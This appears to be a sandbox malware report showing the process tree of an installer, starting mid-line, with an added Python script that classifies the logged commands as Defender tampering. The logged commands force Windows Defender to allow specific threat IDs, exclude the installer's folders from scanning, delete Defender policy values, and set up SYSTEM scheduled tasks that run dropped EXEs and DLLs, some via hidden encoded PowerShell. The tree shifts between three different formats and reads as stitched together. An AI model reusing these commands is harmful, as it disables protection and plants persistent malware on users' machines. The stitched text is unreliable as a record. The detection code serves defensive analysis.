\"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
    PID: 4780
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      PID: 2240
      - Suspicious use of WriteProcessMemory

      Level 4: C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        PID: 2144
    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
      PID: 2012

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
      PID: 2168

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
      PID: 4180

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
      PID: 1892

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
      PID: 2976

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
      PID: 1684

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
      PID: 1736

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
      PID: 3488

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
      PID: 4992

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
      PID: 5036

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
      PID: 2620

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
      PID: 976

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
      PID: 3112

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      PID: 1772

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      PID: 4352

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
      PID: 5052

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
      PID: 4876

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
      PID: 4816

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
      PID: 4548

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
      PID: 4980

    Level 3: C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
      PID: 920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3860
-
-
-
depth 2 | PID 4388 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JuPVqtTuU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JuPVqtTuU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NCzfTsUHwfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NCzfTsUHwfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\phVJOPZyZJOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\phVJOPZyZJOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRZxVByAcqfAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRZxVByAcqfAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hRSVwMivPDBwjMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hRSVwMivPDBwjMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dDIGKoNsMZUYTlNI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dDIGKoNsMZUYTlNI\" /t REG_DWORD /d 0 /reg:64;"
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
depth 3 | PID 4328 | C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:32
depth 4 | PID 752 | C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:32
depth 3 | PID 4372 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:64
depth 3 | PID 704 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:32
depth 3 | PID 2608 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:64
depth 3 | PID 1468 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:32
depth 3 | PID 3776 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:64
depth 3 | PID 2060 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:32
depth 3 | PID 3796 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:64
depth 3 | PID 4216 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:32
depth 3 | PID 4208 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:64
depth 3 | PID 1512 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hRSVwMivPDBwjMVB /t REG_DWORD /d 0 /reg:32
depth 3 | PID 4944 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hRSVwMivPDBwjMVB /t REG_DWORD /d 0 /reg:64
depth 3 | PID 4436 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC /t REG_DWORD /d 0 /reg:32
depth 3 | PID 4204 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC /t REG_DWORD /d 0 /reg:64
depth 3 | PID 4196 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dDIGKoNsMZUYTlNI /t REG_DWORD /d 0 /reg:32
depth 3 | PID 1428 | C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dDIGKoNsMZUYTlNI /t REG_DWORD /d 0 /reg:64
depth 2 | PID 1840 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gGPbIFfGV" /SC once /ST 09:01:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)
depth 2 | PID 4288 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gGPbIFfGV"
depth 2 | PID 5036 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gGPbIFfGV"
depth 2 | PID 3284 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ygwXmmYWmIOQZqgey" /SC once /ST 00:29:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\BPTxocp.exe\" c9 /site_id 525403 /S" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
depth 2 | PID 4352 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ygwXmmYWmIOQZqgey"
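The reg.exe lines above all write to the Windows Defender policy hive, in both the 32-bit and 64-bit registry views: the Threats\ThreatIDDefaultAction entries set the default action for specific threat IDs to 6, which is Allow in Defender's remediation-action enumeration (the codes used by Set-MpPreference and the Group Policy setting), and the Exclusions\Paths entries exclude every directory the installer drops into. The Python below is an added example, not code from the report or from tria.ge: it tokenises such command lines, parses the REG ADD/DELETE options and classifies anything under the Defender policy key as ATT&CK T1562.001 (Impair Defenses: Disable or Modify Tools). The sample lines are copied from this report's process tree plus one constructed benign line; the later REG DELETE lines (the "exe" extension exclusion and SpyNetReporting) are reported as policy changes without guessing at intent.

```python
"""Classify reg.exe / cmd.exe command lines from a sandbox process tree as
Windows Defender policy tampering.

Added example, not part of the tria.ge report.  SAMPLE_LINES are copied from
the process tree (plus one constructed benign line); THREAT_ACTIONS follows
the Defender remediation-action codes, where 6 means Allow.
"""

DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"

# Defender remediation action codes used as ThreatIDDefaultAction data values.
THREAT_ACTIONS = {
    "1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
    "8": "UserDefined", "9": "NoAction", "10": "Block",
}

# Constructed input: command lines copied from the report, plus one benign line.
SAMPLE_LINES = [
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64',
    r'"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dDIGKoNsMZUYTlNI /t REG_DWORD /d 0 /reg:64',
    r'cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32',
    r'cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64',
    r'REG ADD "HKCU\Software\Contoso\Example" /v Installed /t REG_DWORD /d 1 /f',  # benign, constructed
]


def win_split(cmdline):
    """Minimal Windows-style tokenizer: whitespace separates, double quotes group."""
    args, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_reg(cmdline):
    """Return {op, key, value, type, data, view} for a REG ADD/DELETE line, else None."""
    args = win_split(cmdline)
    low = [a.lower() for a in args]
    # The verb may follow "reg", a full path to reg.exe, or sit behind "cmd /C".
    verb = next((i for i in range(1, len(low))
                 if low[i] in ("add", "delete")
                 and (low[i - 1] == "reg" or low[i - 1].endswith("reg.exe"))), None)
    if verb is None or verb + 1 >= len(args):
        return None
    rec = {"op": low[verb].upper(), "key": args[verb + 1],
           "value": None, "type": None, "data": None, "view": None}
    j = verb + 2
    while j < len(args):
        opt = low[j]
        nxt = args[j + 1] if j + 1 < len(args) else None
        if opt == "/v":
            rec["value"], j = nxt, j + 2
        elif opt == "/t":
            rec["type"], j = nxt, j + 2
        elif opt == "/d":
            rec["data"], j = nxt, j + 2
        elif opt.startswith("/reg:"):        # registry view: 32 or 64
            rec["view"], j = opt[5:], j + 1
        else:                                # /f and anything unknown
            j += 1
    return rec


def classify(rec):
    """Map a parsed REG operation to a Defender-tampering finding (ATT&CK T1562.001)."""
    if rec is None:
        return None
    key = rec["key"].lower()
    if not key.startswith(DEFENDER_POLICY.lower()):
        return None
    sub = key[len(DEFENDER_POLICY):].strip("\\")
    finding = {"technique": "T1562.001", "op": rec["op"], "subkey": sub,
               "value": rec["value"], "view": rec["view"]}
    if sub == r"threats\threatiddefaultaction" and rec["op"] == "ADD":
        finding["kind"] = "threat-default-action"
        finding["action"] = THREAT_ACTIONS.get(rec["data"], "unknown")
    elif sub.startswith("exclusions") and rec["op"] == "ADD":
        finding["kind"] = "exclusion-added"
    elif sub.startswith("exclusions"):
        finding["kind"] = "exclusion-policy-deleted"
    elif sub == "spynet":
        finding["kind"] = "maps-reporting-policy"
    else:
        finding["kind"] = "other-defender-policy"
    return finding


def scan(lines):
    """Findings for every line that touches the Defender policy hive."""
    return [f for f in (classify(parse_reg(line)) for line in lines) if f]


def allowed_threat_ids(findings):
    """Threat IDs whose default action was forced to Allow (6)."""
    return sorted({f["value"] for f in findings
                   if f["kind"] == "threat-default-action" and f["action"] == "Allow"})


if __name__ == "__main__":
    results = scan(SAMPLE_LINES)
    for f in results:
        print(f"{f['kind']:<26} {f['op']:<6} {(f['view'] or '-'):>2}-bit  {f['value']}")
    print("allowed threat IDs:", allowed_threat_ids(results))
```

Feeding the full set of ThreatIDDefaultAction lines from the tree through scan() lists every threat ID the installer whitelists; the same parser also catches the later REG DELETE lines because it keys on the policy path, not on the verb.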
depth 1 | PID 5056 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
depth 2 | PID 4904 | C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
depth 1 | PID 4340 | C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
depth 1 | PID 3280 | C:\Windows\system32\gpscript.exe
    gpscript.exe /RefreshSystemParam
depth 1 | PID 4876 | C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\BPTxocp.exe
    C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\BPTxocp.exe c9 /site_id 525403 /S
    - Checks computer location settings
    - Executes dropped EXE
    - Drops Chrome extension
    - Drops desktop.ini file(s)
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
depth 2 | PID 4980 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bsajrHInQFlcwYICLj"
depth 2 | PID 2880 | C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
depth 3 | PID 1488 | C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
depth 2 | PID 4472 | C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
depth 3 | PID 2056 | C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
depth 2 | PID 3584 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JuPVqtTuU\HMQNMm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HnhGGmYUcuANzZs" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
depth 2 | PID 4016 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "HnhGGmYUcuANzZs2" /F /xml "C:\Program Files (x86)\JuPVqtTuU\ZDJrKBR.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
depth 2 | PID 4040 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "HnhGGmYUcuANzZs"
depth 2 | PID 4216 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "HnhGGmYUcuANzZs"
depth 2 | PID 1512 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "qwZMgdHJPwAVJo" /F /xml "C:\Program Files (x86)\phVJOPZyZJOU2\ZsJuKYO.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
depth 2 | PID 3520 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "fSwSvvnEEoVJd2" /F /xml "C:\ProgramData\hRSVwMivPDBwjMVB\RLrlHWS.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
depth 2 | PID 2708 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "mBqqQEpEndyJZOmyy2" /F /xml "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\wRkuupv.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
depth 2 | PID 1104 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "IGrzNxCjwBhGmyGrIyA2" /F /xml "C:\Program Files (x86)\wRZxVByAcqfAC\buiJeUm.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
depth 2 | PID 3388 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ClHbhijVssadMpWzU" /SC once /ST 08:54:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dDIGKoNsMZUYTlNI\cweSAjAw\LJhTtMP.dll\",#1 /site_id 525403" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
depth 2 | PID 2304 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ClHbhijVssadMpWzU"
depth 2 | PID 1268 | C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
depth 3 | PID 1132 | C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
depth 2 | PID 4700 | C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
depth 3 | PID 4052 | C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
depth 2 | PID 4172 | C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ygwXmmYWmIOQZqgey"
depth 1 | PID 3624 | C:\Windows\system32\rundll32.EXE
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dDIGKoNsMZUYTlNI\cweSAjAw\LJhTtMP.dll",#1 /site_id 525403
